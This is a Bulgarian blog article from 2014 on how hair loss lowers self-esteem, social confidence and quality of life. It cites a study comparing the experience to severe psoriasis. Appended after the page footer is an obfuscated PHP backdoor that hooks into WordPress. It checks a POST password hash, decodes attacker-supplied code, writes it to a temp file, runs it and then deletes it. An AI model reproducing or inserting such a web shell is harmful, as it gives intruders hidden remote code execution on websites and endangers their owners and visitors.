Косопадът и качеството на живот | Косопад

Косопадът и качеството на живот

kosopad-jivot

Качество на живот е термин за измерване състоянието на обща задоволеност на човек от живота му. Трудно се измерва, тъй като е субективно схващане, но за да е положителен, някои фактори трябва да са положителни, като ниски нива на стрес, добро здраве, приятни занимания (работа или хобита, които ни правят щастливи), добри социални контакти, възприемане на собствения облик.

Някои фактори могат да повлияят на последно споменатата категория и да занижи качеството ни на живот. Загубата на коса и въздействието върху живота ни за добър пример за дестабилизиращ фактор.

Според проведено изследване, 90% от хората с косопад имат същото усещане за качеството си на живот, като хората, които страдат от остра форма на псориазис (хронично възпалително състояние на кожата).

kosopad-navici

Как се стига до толкова унищожително усещане?

При косопада не се губи само коса, но и самочувствие. И това е доказано от специалисти. Проблемът става психологически: усещането, че губим косата си, влошава социалните ни контакти, и засяга качеството на живот.

Косопадът може сериозно да наруши емоционалният ни баланс. Бързината на косопада и безпомощността, която създава, удря в личното ми самочувствие. Губим самоувереност, ставаме по- притеснителни. Това важи не само за жените, но и за мъжете.

Самоувереността ни е моторът на социалните ни контакти. Ако е засегната, трудно ща общуваме с хората. Няма да можем да покажем какво наистина представляваме. Тези усещания повишават стреса, а той е сред основните фактори за оплешивяване.

08. декември 2014 19:00:12 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}